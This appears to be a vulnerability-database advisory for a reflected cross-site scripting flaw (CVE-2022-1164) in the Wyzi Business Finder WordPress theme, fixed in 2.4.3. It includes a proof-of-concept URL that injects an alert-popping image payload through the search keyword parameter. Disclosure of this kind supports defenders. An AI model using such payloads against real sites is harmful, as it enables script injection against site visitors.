Themes Vulnerabilities

Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)

Description

The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature

Proof of Concept

https://example.com/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0

Affects Themes

wyzi-business-finder
Fixed in 2.4.3

References

CVE
CVE-2022-1164

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
157a9a76-3e5f-4d27-aefc-cb9cb88b3286

Timeline

Publicly Published
2021-02-06 (about 2 years ago)
Added
2021-02-06 (about 2 years ago)
Last Updated
2022-04-08 (about 1 years ago)

Other

Published
Title
Published
2020-03-26
Title
IMPress for IDX Broker < 2.6.2 - Authenticated Stored Cross-Site Scripting (XSS) via unprotected 'idx_update_recaptcha_key' AJAX
Published
2020-06-11
Title
WordPress < 5.4.2 - Authenticated Stored XSS via Theme Upload
Published
2023-04-13
Title
Betheme < 26.8 - Reflected XSS
Published
2023-02-15
Title
Quick Contact Form < 8.0.4 - Admin+ Stored XSS
Published
2019-07-09
Title
Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS